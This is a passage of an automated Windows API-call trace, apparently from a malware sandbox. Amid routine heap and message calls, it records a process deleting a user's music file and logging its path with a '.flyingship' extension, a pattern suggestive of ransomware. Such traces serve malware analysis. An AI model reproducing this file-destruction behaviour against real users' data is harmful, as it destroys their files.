HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0180.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0180.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0180.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0180.936] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0180.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0180.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0180.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0180.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0180.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0180.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0180.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0180.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0180.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0180.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0180.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0180.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0180.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0180.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0180.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0180.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0180.937] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0180.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0180.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.938] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0180.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0180.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.938] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0180.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0180.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.938] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.938] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.938] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.938] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.938] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.938] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.938] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.939] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.939] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.939] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0180.939] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.940] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3-ch0vn.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0180.941] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.941] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.941] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.941] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.941] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0180.941] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.941] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.941] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.943] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.943] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.943] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.943] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.943] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.943] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0180.943] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.943] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.943] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.944] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.944] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.944] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.944] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.944] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a", lpFilePart=0x0) returned 0x2f [0180.945] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3eebe30, ftCreationTime.dwHighDateTime=0x1d5d8ce, ftLastAccessTime.dwLowDateTime=0x63358590, ftLastAccessTime.dwHighDateTime=0x1d5e05d, ftLastWriteTime.dwLowDateTime=0x111fa780, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1318, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="3-CH0vN.m4a", cAlternateFileName="")) returned 0x90ae18 [0180.946] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3-ch0vn.m4a")) returned 1 [0180.947] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3eebe30, ftCreationTime.dwHighDateTime=0x1d5d8ce, ftLastAccessTime.dwLowDateTime=0x63358590, ftLastAccessTime.dwHighDateTime=0x1d5e05d, ftLastWriteTime.dwLowDateTime=0x111fa780, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1318, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="3-CH0vN.m4a", cAlternateFileName="")) returned 0 [0180.947] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0180.948] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.948] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.948] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0180.948] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0180.948] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.948] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.948] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.948] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.948] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0180.948] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0180.948] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0180.948] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0180.949] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0180.949] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.949] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0180.949] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.949] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0180.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0180.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0180.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.950] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0180.950] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x1d4e, lpOverlapped=0x0) returned 1 [0180.950] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0180.950] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x1d4e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.950] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0180.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0180.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0180.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0180.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.flyingship.m4a\r\n", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0180.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3d) returned 0x8db180 [0180.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.flyingship.m4a\r\n", cchWideChar=61, lpMultiByteStr=0x8db180, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.flyingship.m4a\r\n", lpUsedDefaultChar=0x0) returned 61 [0180.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0180.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0180.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0180.951] WriteFile (in: hFile=0x138, lpBuffer=0x8db138*, nNumberOfBytesToWrite=0x3c, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8db138*, lpNumberOfBytesWritten=0x87f43c*=0x3c, lpOverlapped=0x0) returned 1 [0180.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0180.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.951] CloseHandle (hObject=0x138) returned 1 [0180.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0180.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0180.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0180.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0180.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0180.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0180.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0180.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0180.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0180.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0180.953] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0180.953] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0180.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0180.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0180.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0180.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0180.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0180.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0180.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0180.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0180.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0180.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0180.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0180.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0180.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0180.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0180.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0180.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0180.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0180.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0180.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0180.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0180.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0180.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0180.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0180.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0180.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0180.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0180.954] HeapFree (in: hHeap=0x8a0000, 